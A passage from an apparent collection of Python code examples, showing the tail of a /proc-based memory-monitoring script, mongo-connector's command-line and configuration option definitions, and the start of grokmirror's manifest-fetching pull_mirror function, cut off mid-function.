        except:
            pass
    if user == "failed":
        print(" ! Failed to find out the current user")

    # preparing logfile
    if _log:
        try:  # the destination might not be writeable
            if path.isfile(_logfile):
                move(_logfile, _logfile + ".old")
            lfile = open(_logfile, 'a')
            lfile.write("##Date     time   wrtble ram   swap     pgin   "
                        "pgout   IOw TopApp:PID wrtbl(KB) command\n")
            lfile.close()
        except:
            print(" \033[0m \033[95m ERROR: Failed to prepare/create the "
                  "log file in current directory!\033[0m")
            _log = False

    while True:
        memD = {}  # key(~memory):real memory
        keys = ()  # list of keys (to be listed by size)
        key_pid = {}  # key(~memory):PID
        pid_mem = {}  # dictionary of PID to cur memory, redefining to empty it
        # this is ugly workaround to make sure there are no same numbers
        margin = 0.0001
        totalMemByPmap = 0
        oldMemDtmp = {}      # dictionary of mem. in previous iteration PID:mem
        processes = 0  # count of identified processes

        # first we will identify number of processes
        for directory in listdir('/proc'):
            try:  # elimination non-numerical dirs
                int(directory)  # directory = PID
            except:
                continue

            # calculating private memory in /proc/$PID/maps file
            try:
                realMem = get_private_mem(directory)
            except:  # process probably doesnt exist anymore
                continue

            totalMemByPmap = totalMemByPmap + int(realMem)

            # creating key, this is basically real memory plus
            # a very small number
            key1 = int(realMem) + margin
            key_pid[key1] = directory
            pid_mem[directory] = realMem
            margin = margin + 0.0001
        # now we have all memory data for current iteration

        # creating list of keys - sorted
        keys = key_pid.keys()
        keys = sorted(keys, reverse=True)
        processes = len(keys)
        #print (key_pid)

        ##############  printing ##################

        # finding terminal lenght (doing it every iteration)
        try:
            width = int(get_command_output("stty size | awk '{print $2}'"))
        except:
            width = 80
        if width < 46:
            print('\033[0m' + '\033[95;1m' + " ! Terminal width " +
                  str(width) + " not sufficient, 46 is minimum...." +
                  '\033[0m')
            width = 46

        # calculating widht of individual columns
        col1, col2, col3 = 8, 11, 11
        col4 = int((width - col1 - col2 - col3 - 2) / 2)
        col5 = width - col1 - col2 - col3 - col4

        # printing header
        if _format == "numb":
            a = "previous |"
        elif _format == "graph":
            a = "change  |"
        curtime = strftime("%d %b %H:%M:%S", localtime())[-col5:]
        print("\033[0m\033[1m{:>{a}s}{:>{b}s}{:<{c}s}{:>{d}s}".format("PID |",
                                                                      "private/writ. mem |",
                                                                      "command",
                                                                      curtime,
                                                                      a=col1,
                                                                      b=col2 + col3,
                                                                      c=col4,
                                                                      d=col5))
        wtime = str("(waiting " + str(_period) + " min.)")[-col5:]
        trunc = "(might be truncated)"[:col4]
        print("{:>{a}s}{:>{b}s}{:>{c}s}{:<{d}s}{:>{e}s}\033[0m".format("|",
                                                                       "current |",
                                                                       a,
                                                                       trunc,
                                                                       wtime,
                                                                       a=col1,
                                                                       b=col2,
                                                                       c=col3,
                                                                       d=col4,
                                                                       e=col5))

        # printing body (lines with processes)
        printedlines = 0  # just count printed lines
        #print ("processes:" +processes)
        for item in keys[0:processes]:

            #print ("Doing: "+item)
            # gettind command and shortening if needed
            try:
                pid = key_pid[item]
                cmdfile = str("/proc/" + str(pid) + "/cmdline")
                f = open(cmdfile, 'r')
                command = open(cmdfile, "rt").read().replace(
                    "\0", " ")[:col4 + col5]
                f.close()
            except:
                continue

            #print (command)
            # getting formatted value of current memory usage
            curMem = pid_mem[pid]
            try:
                oldMem = pid_omem[pid]
            except:
                oldMem = 0

            curMemStr = format_mem_numb(curMem)
            if _format == "numb":
                s2 = format_mem_numb(oldMem) + " |"
            elif _format == "graph":
                s2 = graph_format(curMem, oldMem, _firstiteration) + " |"

            s0 = str(key_pid[item] + " |")
            s1 = str(curMemStr + " |")
            # getting rid of binary characters
            command = ''.join(s for s in command if s in printable)

            print("{:>{a}s}{:>{b}s}{:>{c}s}{:<{d}s}".format(
                s0, s1, s2, command, a=col1, b=col2, c=col3, d=col4 + col5))

            if _log and printedlines == 0:
                outline_comm = " {:>7s} {:>9.0f}  {:20s}".format(
                    pid, round(curMem / 1024, 0), command)

            printedlines = printedlines + 1
            if printedlines >= _rows:
                break

        # printing footer - info on overall cpu utilization
        totalMem, ramuse, swapuse = get_cur_mem_use()
        totalMemByPmapKB = int(round(totalMemByPmap / 1000, 1))
        curMemUsage = round(totalMemByPmapKB * 100 / float(totalMem), 1)

        if _format == "numb":
            formatting_string = "{:>18s}{:>4.1f}{:s}{:5.1f}{:<1s}"
            print(formatting_string.format("Writeable/RAM: ",
                                           curMemUsage,
                                           "%     (old value: ",
                                           oldMemUsage,
                                           "%)"))
        elif _format == "graph":
            onePrc = width / 280.0
            firstLen = int(round(min(curMemUsage, 100) * onePrc))
            if curMemUsage > 100:
                secondLen = int(round((curMemUsage - 100) * onePrc))
            else:
                secondLen = 0
            # print curMemUsage, onePrc, firstLen , secondLen
            bar = str('=' * firstLen + str('#' * secondLen))
            print("{:>18s}{:s}{:>6.1f}{:s}".format(
                "Writeable/RAM: ", bar, curMemUsage, "%"))

        else:
            print((" ! Unexpected data presentation format - internall error, "
                   "quitting..."))
            sys.exit()

        if verbose:
            print("   RAM use without cached pages: " +
                  ramuse + "% , SWAP use: " + swapuse + "%")
        if verbose or _log:
            check_swapping(_firstiteration, verbose)

        # print warning if user is not root
        if "root" not in user:
            print("")
            print("     \033[0m \033[95m WARNING: Running without ROOT "
                  "CREDENTIALS, data might be incomplete...\033[0m")

        oldMemUsage = curMemUsage
        pid_omem = pid_mem.copy()
        print("")

        _firstiteration = False

        # because of problems when piping output. But might be not needed
        sys.stdout.flush()

        # writing logfile
        if _log:
            lfile = open(_logfile, 'a')
            outline_time = strftime("%d/%m/%Y") + " " + strftime("%H:%M") + " "
            outline_ram = " {:>5s} {:>5s} {:>5s}".format(
                str(curMemUsage), str(ramuse), str(swapuse))
            outline_pg = " {:>8.2f}{:>8.2f}{:>6.1f}".format(
                _pageinsec, _pageoutsec, _IOwaitprc)
            lfile.write(
                outline_time + outline_ram + outline_pg + outline_comm + "\n")
            lfile.close()

        sleep(_period * 60 - 2)

Example 168

Project: mongo-connector Source File: connector.py
Function: get_config_options
def get_config_options():
    result = []

    def add_option(*args, **kwargs):
        opt = config.Option(*args, **kwargs)
        result.append(opt)
        return opt

    main_address = add_option(
        config_key="mainAddress",
        default="localhost:27017",
        type=str)

    # -m is for the main address, which is a host:port pair, ideally of the
    # mongos. For non sharded clusters, it can be the primary.
    main_address.add_cli(
        "-m", "--main", dest="main_address", help=
        "Specify the main address, which is a"
        " host:port pair. For sharded clusters, this"
        " should be the mongos address. For individual"
        " replica sets, supply the address of the"
        " primary. For example, `-m localhost:27217`"
        " would be a valid argument to `-m`. Don't use"
        " quotes around the address.")

    oplog_file = add_option(
        config_key="oplogFile",
        default="oplog.timestamp",
        type=str)

    # -o is to specify the oplog-config file. This file is used by the system
    # to store the last timestamp read on a specific oplog. This allows for
    # quick recovery from failure.
    oplog_file.add_cli(
        "-o", "--oplog-ts", dest="oplog_file", help=
        "Specify the name of the file that stores the "
        "oplog progress timestamps. "
        "This file is used by the system to store the last "
        "timestamp read on a specific oplog. This allows "
        "for quick recovery from failure. By default this "
        "is `config.txt`, which starts off empty. An empty "
        "file causes the system to go through all the mongo "
        "oplog and sync all the docuements. Whenever the "
        "cluster is restarted, it is essential that the "
        "oplog-timestamp config file be emptied - otherwise "
        "the connector will miss some docuements and behave "
        "incorrectly.")

    no_dump = add_option(
        config_key="noDump",
        default=False,
        type=bool)

    # --no-dump specifies whether we should read an entire collection from
    # scratch if no timestamp is found in the oplog_config.
    no_dump.add_cli(
        "--no-dump", action="store_true", dest="no_dump", help=
        "If specified, this flag will ensure that "
        "mongo_connector won't read the entire contents of a "
        "namespace iff --oplog-ts points to an empty file.")

    batch_size = add_option(
        config_key="batchSize",
        default=constants.DEFAULT_BATCH_SIZE,
        type=int)

    # --batch-size specifies num docs to read from oplog before updating the
    # --oplog-ts config file with current oplog position
    batch_size.add_cli(
        "--batch-size", type="int", dest="batch_size", help=
        "Specify an int to update the --oplog-ts "
        "config file with latest position of oplog every "
        "N docuements. By default, the oplog config isn't "
        "updated until we've read through the entire oplog. "
        "You may want more frequent updates if you are at risk "
        "of falling behind the earliest timestamp in the oplog")

    def apply_verbosity(option, cli_values):
        if cli_values['verbose']:
            option.value = 3
        if option.value < 0 or option.value > 3:
            raise errors.InvalidConfiguration(
                "verbosity must be in the range [0, 3].")

    # Default is warnings and above.
    verbosity = add_option(
        config_key="verbosity",
        default=1,
        type=int,
        apply_function=apply_verbosity)

    # -v enables verbose logging
    verbosity.add_cli(
        "-v", "--verbose", action="store_true",
        dest="verbose", help="Enables verbose logging.")

    def apply_logging(option, cli_values):
        log_mechs_enabled = [cli_values[m]
                             for m in ('logfile', 'enable_syslog', 'stdout')
                             if cli_values[m]]
        if len(log_mechs_enabled) > 1:
            raise errors.InvalidConfiguration(
                "You cannot specify more than one logging method "
                "simultaneously. Please choose the logging method you "
                "prefer. ")
        if cli_values['log_format']:
            option.value['format'] = cli_values['log_format']

        if cli_values['logfile']:
            when = cli_values['logfile_when']
            interval = cli_values['logfile_interval']
            if (when and when.startswith('W') and
                    interval != constants.DEFAULT_LOGFILE_INTERVAL):
                raise errors.InvalidConfiguration(
                    "You cannot specify a log rotation interval when rotating "
                    "based on a weekday (W0 - W6).")

            option.value['type'] = 'file'
            option.value['filename'] = cli_values['logfile']
            if when:
                option.value['rotationWhen'] = when
            if interval:
                option.value['rotationInterval'] = interval
            if cli_values['logfile_backups']:
                option.value['rotationBackups'] = cli_values['logfile_backups']

        if cli_values['enable_syslog']:
            option.value['type'] = 'syslog'

        if cli_values['syslog_host']:
            option.value['host'] = cli_values['syslog_host']

        if cli_values['syslog_facility']:
            option.value['facility'] = cli_values['syslog_facility']

        if cli_values['stdout']:
            option.value['type'] = 'stream'

        # Expand the full path to log file
        option.value['filename'] = os.path.abspath(option.value['filename'])

    default_logging = {
        'type': 'file',
        'filename': 'mongo-connector.log',
        'format': constants.DEFAULT_LOG_FORMAT,
        'rotationInterval': constants.DEFAULT_LOGFILE_INTERVAL,
        'rotationBackups': constants.DEFAULT_LOGFILE_BACKUPCOUNT,
        'rotationWhen': constants.DEFAULT_LOGFILE_WHEN,
        'host': constants.DEFAULT_SYSLOG_HOST,
        'facility': constants.DEFAULT_SYSLOG_FACILITY
    }

    logging = add_option(
        config_key="logging",
        default=default_logging,
        type=dict,
        apply_function=apply_logging)

    # -w enables logging to a file
    logging.add_cli(
        "-w", "--logfile", dest="logfile", help=
        "Log all output to the specified file.")

    logging.add_cli(
        '--stdout', dest='stdout', action='store_true', help=
        'Log all output to STDOUT rather than a logfile.')

    logging.add_cli(
        "--log-format", dest="log_format", help=
        "Define a specific format for the log file. "
        "This is based on the python logging lib. "
        "Available parameters can be found at "
        "https://docs.python.org/2/library/logging.html#logrecord-attributes")

    # -s is to enable syslog logging.
    logging.add_cli(
        "-s", "--enable-syslog", action="store_true",
        dest="enable_syslog", help=
        "The syslog host, which may be an address like 'localhost:514' or, "
        "on Unix/Linux, the path to a Unix domain socket such as '/dev/log'.")

    # --syslog-host is to specify the syslog host.
    logging.add_cli(
        "--syslog-host", dest="syslog_host", help=
        "Used to specify the syslog host."
        " The default is 'localhost:514'")

    # --syslog-facility is to specify the syslog facility.
    logging.add_cli(
        "--syslog-facility", dest="syslog_facility", help=
        "Used to specify the syslog facility."
        " The default is 'user'")

    # --logfile-when specifies the type of interval of the rotating file
    # (seconds, minutes, hours)
    logging.add_cli("--logfile-when", action="store", dest="logfile_when",
                    type="string",
                    help="The type of interval for rotating the log file. "
                    "Should be one of "
                    "'S' (seconds), 'M' (minutes), 'H' (hours), "
                    "'D' (days), 'W0' - 'W6' (days of the week 0 - 6), "
                    "or 'midnight' (the default). See the Python docuementation "
                    "for 'logging.handlers.TimedRotatingFileHandler' for more "
                    "details.")

    # --logfile-interval specifies when to create a new log file
    logging.add_cli("--logfile-interval", action="store",
                    dest="logfile_interval", type="int",
                    help="How frequently to rotate the log file, "
                    "specifically, how many units of the rotation interval "
                    "should pass before the rotation occurs. For example, "
                    "to create a new file each hour: "
                    " '--logfile-when=H --logfile-interval=1'. "
                    "Defaults to 1. You may not use this option if "
                    "--logfile-when is set to a weekday (W0 - W6). "
                    "See the Python docuementation for "
                    "'logging.handlers.TimedRotatingFileHandler' for more "
                    "details. ")

    # --logfile-backups specifies how many log files will be kept.
    logging.add_cli("--logfile-backups", action="store",
                    dest="logfile_backups", type="int",
                    help="How many log files will be kept after rotation. "
                    "If set to zero, then no log files will be deleted. "
                    "Defaults to 7.")

    def apply_authentication(option, cli_values):
        if cli_values['admin_username']:
            option.value['adminUsername'] = cli_values['admin_username']

        if cli_values['password']:
            option.value['password'] = cli_values['password']

        if cli_values['password_file']:
            option.value['passwordFile'] = cli_values['password_file']

        if option.value.get("adminUsername"):
            password = option.value.get("password")
            passwordFile = option.value.get("passwordFile")
            if not password and not passwordFile:
                raise errors.InvalidConfiguration(
                    "Admin username specified without password.")
            if password and passwordFile:
                raise errors.InvalidConfiguration(
                    "Can't specify both password and password file.")

    default_authentication = {
        'adminUsername': None,
        'password': None,
        'passwordFile': None
    }

    authentication = add_option(
        config_key="authentication",
        default=default_authentication,
        type=dict,
        apply_function=apply_authentication)

    # -a is to specify the username for authentication.
    authentication.add_cli(
        "-a", "--admin-username", dest="admin_username", help=
        "Used to specify the username of an admin user to "
        "authenticate with. To use authentication, the user "
        "must specify both an admin username and a keyFile.")

    # -p is to specify the password used for authentication.
    authentication.add_cli(
        "-p", "--password", dest="password", help=
        "Used to specify the password."
        " This is used by mongos to authenticate"
        " connections to the shards, and in the"
        " oplog threads. If authentication is not used, then"
        " this field can be left empty as the default ")

    # -f is to specify the authentication key file. This file is used by mongos
    # to authenticate connections to the shards, and we'll use it in the oplog
    # threads.
    authentication.add_cli(
        "-f", "--password-file", dest="password_file", help=
        "Used to store the password for authentication."
        " Use this option if you wish to specify a"
        " username and password but don't want to"
        " type in the password. The contents of this"
        " file should be the password for the admin user.")

    def apply_fields(option, cli_values):
        if cli_values['fields']:
            option.value = cli_values['fields'].split(",")

    fields = add_option(
        config_key="fields",
        default=[],
        type=list,
        apply_function=apply_fields)

    # -i to specify the list of fields to export
    fields.add_cli(
        "-i", "--fields", dest="fields", help=
        "Use a comma separated list of fields to specify multiple fields. "
        "Will copy over the fields specified into a new docuement."
        "The '_id', 'ns' and '_ts' fields are always "
        "exported. Supports dot notation for docuement fields but cannot span "
        "arrays. Cannot use both 'fields' and 'exclude_fields'.")

    def apply_exclude_fields(option, cli_values):
        if cli_values['exclude_fields']:
            option.value = cli_values['exclude_fields'].split(",")

    exclude_fields = add_option(
        config_key="exclude_fields",
        default=[],
        type=list,
        apply_function=apply_exclude_fields)

    # -i to specify the list of fields to exclude
    exclude_fields.add_cli(
        "-e", "--exclude_fields", dest="exclude_fields", help=
        "Use a comma separated list of fields to specify multiple "
        "fields to exclude. Will delete the fields specified from the "
        "existing docuement. The '_id', 'ns' and '_ts' fields are always "
        "exported. Supports dot notation for docuement fields but cannot span "
        "arrays. Cannot use both 'fields' and 'exclude_fields'.")

    def apply_namespaces(option, cli_values):
        if cli_values['ns_set']:
            option.value['include'] = cli_values['ns_set'].split(',')

        if cli_values['ex_ns_set']:
            option.value['exclude'] = cli_values['ex_ns_set'].split(',')

        if cli_values['gridfs_set']:
            option.value['gridfs'] = cli_values['gridfs_set'].split(',')

        if cli_values['dest_ns_set']:
            ns_set = option.value['include']
            dest_ns_set = cli_values['dest_ns_set'].split(',')
            if len(ns_set) != len(dest_ns_set):
                raise errors.InvalidConfiguration(
                    "Destination namespace set should be the"
                    " same length as the origin namespace set.")
            option.value['mapping'] = dict(zip(ns_set, dest_ns_set))

        ns_set = option.value['include']
        if len(ns_set) != len(set(ns_set)):
            raise errors.InvalidConfiguration(
                "Namespace set should not contain any duplicates.")

        ex_ns_set = option.value['exclude']
        if len(ex_ns_set) != len(set(ex_ns_set)):
            raise errors.InvalidConfiguration(
                "Exclude namespace set should not contain any duplicates.")

        # not allow to exist both 'include' and 'exclude'
        if ns_set and ex_ns_set:
            raise errors.InvalidConfiguration(
                "Cannot use both namespace 'include' "
                "(--namespace-set) and 'exclude' "
                "(--exclude-namespace-set).")

        # validate 'include' format
        for ns in ns_set:
            if ns.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "Namespace set should be plain text "
                    "e.g. foo.bar or only contains one wildcard, e.g. foo.* .")

        # validate 'exclude' format
        for ens in ex_ns_set:
            if ens.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "Exclude namespace set should be plain text "
                    "e.g. foo.bar or only contains one wildcard, e.g. foo.* .")

        dest_mapping = option.value['mapping']
        if len(dest_mapping) != len(set(dest_mapping.values())):
            raise errors.InvalidConfiguration(
                "Destination namespaces set should not"
                " contain any duplicates.")

        for key, value in dest_mapping.items():
            if key.count("*") > 1 or value.count("*") > 1:
                raise errors.InvalidConfiguration(
                    "The namespace mapping source and destination "
                    "cannot contain more than one '*' character.")
            if key.count("*") != value.count("*"):
                raise errors.InvalidConfiguration(
                    "The namespace mapping source and destination "
                    "must contain the same number of '*' characters.")

        gridfs_set = option.value['gridfs']
        if len(gridfs_set) != len(set(gridfs_set)):
            raise errors.InvalidConfiguration(
                "GridFS set should not contain any duplicates.")

    default_namespaces = {
        "include": [],
        "exclude": [],
        "mapping": {},
        "gridfs": []
    }

    namespaces = add_option(
        config_key="namespaces",
        default=default_namespaces,
        type=dict,
        apply_function=apply_namespaces)

    # -n is to specify the namespaces we want to consider. The default
    # considers all the namespaces
    namespaces.add_cli(
        "-n", "--namespace-set", dest="ns_set", help=
        "Used to specify the namespaces we want to "
        "consider. For example, if we wished to store all "
        "docuements from the test.test and alpha.foo "
        "namespaces, we could use `-n test.test,alpha.foo`. "
        "You can also use, for example, `-n test.*` to store "
        "docuements from all the collections of db test. "
        "The default is to consider all the namespaces, "
        "excluding the system and config databases, and "
        "also ignoring the \"system.indexes\" collection in "
        "any database. This cannot be used together with "
        "'--exclude-namespace-set'!")

    # -x is to specify the namespaces we dont want to consider. The default
    # is empty
    namespaces.add_cli(
        "-x", "--exclude-namespace-set", dest="ex_ns_set", help=
        "Used to specify the namespaces we do not want to "
        "consider. For example, if we wished to ignore all "
        "docuements from the test.test and alpha.foo "
        "namespaces, we could use `-x test.test,alpha.foo`. "
        "You can also use, for example, `-x test.*` to ignore "
        "docuements from all the collections of db test. "
        "The default is not to exclude any namespace. "
        "This cannot be used together with '--namespace-set'!")

    # -g is the destination namespace
    namespaces.add_cli(
        "-g", "--dest-namespace-set", dest="dest_ns_set", help=
        "Specify a destination namespace mapping. Each "
        "namespace provided in the --namespace-set option "
        "will be mapped respectively according to this "
        "comma-separated list. These lists must have "
        "equal length. "
        "It also supports mapping using wildcard, for example, "
        "map foo.* to bar_*.someting, means that if we have two "
        "collections foo.a and foo.b, they will map to "
        "bar_a.something and bar_b.something. "
        "The default is to use the identity "
        "mapping. This works for mongo-to-mongo as well as"
        "mongo-to-elasticsearch connections.")

    # --gridfs-set is the set of GridFS namespaces to consider
    namespaces.add_cli(
        "--gridfs-set", dest="gridfs_set", help=
        "Used to specify the GridFS namespaces we want to "
        "consider. For example, if your metadata is stored in "
        "test.fs.files and chunks are stored in test.fs.chunks, "
        "you can use `--gridfs-set test.fs`.")

    def apply_doc_managers(option, cli_values):
        if not option.value:
            if not cli_values['doc_manager'] and not cli_values['target_url']:
                return
            option.value = [{}]

        # Command line options should override the first DocManager config.
        cli_to_config = dict(doc_manager='docManager',
                             target_url='targetURL',
                             auto_commit_interval='autoCommitInterval',
                             unique_key='uniqueKey')
        first_dm = option.value[0]
        for cli_name, value in cli_values.items():
            if value is not None:
                first_dm[cli_to_config[cli_name]] = value

        # validate doc managers and fill in default values
        for dm in option.value:
            if not isinstance(dm, dict):
                raise errors.InvalidConfiguration(
                    "Elements of docManagers must be a dict.")
            if 'docManager' not in dm and 'docManagerClassPath' not in dm:
                raise errors.InvalidConfiguration(
                    "Every element of docManagers"
                    " must contain 'docManager' property.")
            if not dm.get('targetURL'):
                dm['targetURL'] = None
            if not dm.get('uniqueKey'):
                dm['uniqueKey'] = constants.DEFAULT_UNIQUE_KEY
            if dm.get('autoCommitInterval') is None:
                dm['autoCommitInterval'] = constants.DEFAULT_COMMIT_INTERVAL
            if not dm.get('args'):
                dm['args'] = {}
            if not dm.get('bulkSize'):
                dm['bulkSize'] = constants.DEFAULT_MAX_BULK

            aci = dm['autoCommitInterval']
            if aci is not None and aci < 0:
                raise errors.InvalidConfiguration(
                    "autoCommitInterval must be non-negative.")

        def import_dm_by_name(name):
            full_name = "mongo_connector.doc_managers.%s.DocManager" % name
            return import_dm_by_path(full_name)

        def import_dm_by_path(path):
            try:
                # importlib doesn't exist in 2.6, but __import__ is everywhere
                package, klass = path.rsplit('.', 1)
                module = __import__(package, fromlist=(package,))
                dm_impl = getattr(module, klass)
                if not issubclass(dm_impl, DocManagerBase):
                    raise TypeError("DocManager must inherit DocManagerBase.")
                return dm_impl
            except ImportError:
                raise errors.InvalidConfiguration(
                    "Could not import %s. It could be that this doc manager ha"
                    "s been moved out of this project and is maintained elsewh"
                    "ere. Make sure that you have the doc manager installed al"
                    "ongside mongo-connector. Check the README for a list of a"
                    "vailable doc managers." % package)
                sys.exit(1)
            except (AttributeError, TypeError):
                raise errors.InvalidConfiguration(
                    "No definition for DocManager found in %s." % package)
                sys.exit(1)

        # instantiate the doc manager objects
        dm_instances = []
        for dm in option.value:
            if 'docManagerClassPath' in dm:
                DocManager = import_dm_by_path(dm['docManagerClassPath'])
            else:
                DocManager = import_dm_by_name(dm['docManager'])
            kwargs = {
                'unique_key': dm['uniqueKey'],
                'auto_commit_interval': dm['autoCommitInterval'],
                'chunk_size': dm['bulkSize']
            }
            for k in dm['args']:
                if k not in kwargs:
                    kwargs[k] = dm['args'][k]

            target_url = dm['targetURL']
            if target_url:
                dm_instances.append(DocManager(target_url, **kwargs))
            else:
                dm_instances.append(DocManager(**kwargs))

        option.value = dm_instances

    doc_managers = add_option(
        config_key="docManagers",
        default=None,
        type=list,
        apply_function=apply_doc_managers)

    # -d is to specify the doc manager file.
    doc_managers.add_cli(
        "-d", "--doc-manager", dest="doc_manager", help=
        "Used to specify the path to each doc manager "
        "file that will be used. DocManagers should be "
        "specified in the same order as their respective "
        "target addresses in the --target-urls option. "
        "URLs are assigned to doc managers "
        "respectively. Additional doc managers are "
        "implied to have no target URL. Additional URLs "
        "are implied to have the same doc manager type as "
        "the last doc manager for which a URL was "
        "specified. By default, Mongo Connector will use "
        "'doc_manager_simulator.py'.  It is recommended "
        "that all doc manager files be kept in the "
        "doc_managers folder in mongo-connector. For "
        "more information about making your own doc "
        "manager, see 'Writing Your Own DocManager' "
        "section of the wiki")

    # -d is to specify the doc manager file.
    doc_managers.add_cli(
        "-t", "--target-url",
        dest="target_url", help=
        "Specify the URL to each target system being "
        "used. For example, if you were using Solr out of "
        "the box, you could use '-t "
        "http://localhost:8080/solr' with the "
        "SolrDocManager to establish a proper connection. "
        "URLs should be specified in the same order as "
        "their respective doc managers in the "
        "--doc-managers option.  URLs are assigned to doc "
        "managers respectively. Additional doc managers "
        "are implied to have no target URL. Additional "
        "URLs are implied to have the same doc manager "
        "type as the last doc manager for which a URL was "
        "specified. "
        "Don't use quotes around addresses. ")

    # -u is to specify the mongoDB field that will serve as the unique key
    # for the target system,
    doc_managers.add_cli(
        "-u", "--unique-key", dest="unique_key", help=
        "The name of the MongoDB field that will serve "
        "as the unique key for the target system. "
        "Note that this option does not apply "
        "when targeting another MongoDB cluster. "
        "Defaults to \"_id\".")

    # --auto-commit-interval to specify auto commit time interval
    doc_managers.add_cli(
        "--auto-commit-interval", type="int",
        dest="auto_commit_interval", help=
        "Seconds in-between calls for the Doc Manager"
        " to commit changes to the target system. A value of"
        " 0 means to commit after every write operation."
        " When left unset, Mongo Connector will not make"
        " explicit commits. Some systems have"
        " their own mechanism for adjusting a commit"
        " interval, which should be preferred to this"
        " option.")

    continue_on_error = add_option(
        config_key="continueOnError",
        default=False,
        type=bool)

    def apply_ssl(option, cli_values):
        option.value = option.value or {}
        ssl_certfile = cli_values.pop('ssl_certfile')
        ssl_keyfile = cli_values.pop('ssl_keyfile')
        ssl_cert_reqs = cli_values.pop('ssl_cert_reqs')
        ssl_ca_certs = (
            cli_values.pop('ssl_ca_certs') or option.value.get('sslCACerts'))

        if ssl_cert_reqs and ssl_cert_reqs != 'ignored' and not ssl_ca_certs:
            raise errors.InvalidConfiguration(
                '--ssl-ca-certs must be provided if the '
                '--ssl-certificate-policy is not "ignored".')
        option.value.setdefault('sslCertfile', ssl_certfile)
        option.value.setdefault('sslCACerts', ssl_ca_certs)
        option.value.setdefault('sslKeyfile', ssl_keyfile)
        option.value['sslCertificatePolicy'] = _SSL_POLICY_MAP.get(
            ssl_cert_reqs)
    ssl = add_option(
        config_key="ssl",
        default={},
        type=dict,
        apply_function=apply_ssl)
    ssl.add_cli(
        '--ssl-certfile', dest='ssl_certfile',
        help=('Path to a certificate identifying the local connection '
              'to MongoDB.')
    )
    ssl.add_cli(
        '--ssl-keyfile', dest='ssl_keyfile',
        help=('Path to the private key for --ssl-certfile. '
              'Not necessary if already included in --ssl-certfile.')
    )
    ssl.add_cli(
        '--ssl-certificate-policy', dest='ssl_cert_reqs',
        choices=('required', 'optional', 'ignored'),
        help=('Policy for validating SSL certificates provided from the other '
              'end of the connection. There are three possible values: '
              'required = Require and validate the remote certificate. '
              'optional = Validate the remote certificate only if one '
              'is provided. '
              'ignored = Remote SSL certificates are ignored completely.')
    )
    ssl.add_cli(
        '--ssl-ca-certs', dest='ssl_ca_certs',
        help=('Path to a concatenated set of certificate authority '
              'certificates to validate the other side of the connection. ')
    )

    # --continue-on-error to continue to upsert docuements during a collection
    # dump, even if the docuements cannot be inserted for some reason
    continue_on_error.add_cli(
        "--continue-on-error", action="store_true",
        dest="continue_on_error", help=
        "By default, if any docuement fails to upsert"
        " during a collection dump, the entire operation fails."
        " When this flag is enabled, normally fatal errors"
        " will be caught and logged, allowing the collection"
        " dump to continue.\n"
        "Note: Applying oplog operations to an incomplete"
        " set of docuements due to errors may cause undefined"
        " behavior. Use this flag to dump only.")

    config_file = add_option()
    config_file.add_cli(
        "-c", "--config-file", dest="config_file", help=
        "Specify a JSON file to load configurations from. You can find"
        " an example config file at mongo-connector/config.json")

    tz_aware = add_option(
        config_key="timezoneAware", default=False, type=bool)
    tz_aware.add_cli(
        "--tz-aware", dest="tz_aware", action="store_true",
        help="Make all dates and times timezone-aware.")

    return result

Example 169

Project: grokmirror Source File: pull.py
def pull_mirror(name, config, verbose=False, force=False, nomtime=False,
                verify=False, verify_subpath='*', noreuse=False,
                purge=False, pretty=False, forcepurge=False):
    global logger
    global lock_fails

    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)

    if 'log' in config.keys():
        ch = logging.FileHandler(config['log'])
        formatter = logging.Formatter(
            "[%(process)d] %(asctime)s - %(levelname)s - %(message)s")
        ch.setFormatter(formatter)
        loglevel = logging.INFO

        if 'loglevel' in config.keys():
            if config['loglevel'] == 'debug':
                loglevel = logging.DEBUG

        ch.setLevel(loglevel)
        logger.addHandler(ch)

    ch = logging.StreamHandler()
    formatter = logging.Formatter('%(message)s')
    ch.setFormatter(formatter)

    if verbose:
        ch.setLevel(logging.INFO)
    else:
        ch.setLevel(logging.CRITICAL)

    logger.addHandler(ch)

    # push it into grokmirror to override the default logger
    grokmirror.logger = logger

    logger.info('Checking [%s]' % name)
    mymanifest = config['mymanifest']

    if verify:
        logger.info('Verifying mirror against %s' % config['manifest'])
        nomtime = True

    if config['manifest'].find('file:///') == 0:
        manifile = config['manifest'].replace('file://', '')
        if not os.path.exists(manifile):
            logger.critical('Remote manifest not found in %s! Quitting!'
                            % config['manifest'])
            return 1

        fstat = os.stat(manifile)
        last_modified = fstat[8]
        logger.debug('mtime on %s is: %s' % (manifile, fstat[8]))

        if os.path.exists(config['mymanifest']):
            fstat = os.stat(config['mymanifest'])
            my_last_modified = fstat[8]
            logger.debug('Our last-modified is: %s' % my_last_modified)
            if not (force or nomtime) and last_modified <= my_last_modified:
                logger.info('Manifest file unchanged. Quitting.')
                return 0

        logger.info('Reading new manifest from %s' % manifile)
        manifest = grokmirror.read_manifest(manifile)
        # Don't accept empty manifests -- that indicates something is wrong
        if not len(manifest.keys()):
            logger.critical('Remote manifest empty or unparseable! Quitting.')
            return 1

    else:
        # Load it from remote host using http and header magic
        logger.info('Fetching remote manifest from %s' % config['manifest'])

        # Do we have username:password@ in the URL?
        chunks = urlparse.urlparse(config['manifest'])
        if chunks.netloc.find('@') > 0:
            logger.debug('Taking username/password from the URL for basic auth')
            (upass, netloc) = chunks.netloc.split('@')
            if upass.find(':') > 0:
                (username, password) = upass.split(':')
            else:
                username = upass
                password = ''

            manifesturl = config['manifest'].replace(chunks.netloc, netloc)
            logger.debug('manifesturl=%s' % manifesturl)
            request = urllib2.Request(manifesturl)

            password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_mgr.add_password(None, manifesturl, username, password)
            auth_handler = urllib2.HTTPBasicAuthHandler(password_mgr)
            opener = urllib2.build_opener(auth_handler)

        else:
            request = urllib2.Request(config['manifest'])
            opener = urllib2.build_opener()

        # Find out if we need to run at all first
        if not (force or nomtime) and os.path.exists(mymanifest):
            fstat = os.stat(mymanifest)
            mtime = fstat[8]
            logger.debug('mtime on %s is: %s' % (mymanifest, mtime))
            my_last_modified = time.strftime('%a, %d %b %Y %H:%M:%S GMT',
                                             time.gmtime(mtime))
            logger.debug('Our last-modified is: %s' % my_last_modified)
            request.add_header('If-Modified-Since', my_last_modified)

        try:
            ufh = opener.open(request, timeout=30)
        except urllib2.HTTPError, ex:
            if ex.code == 304:
                logger.info('Server says we have the latest manifest. '
                            'Quitting.')
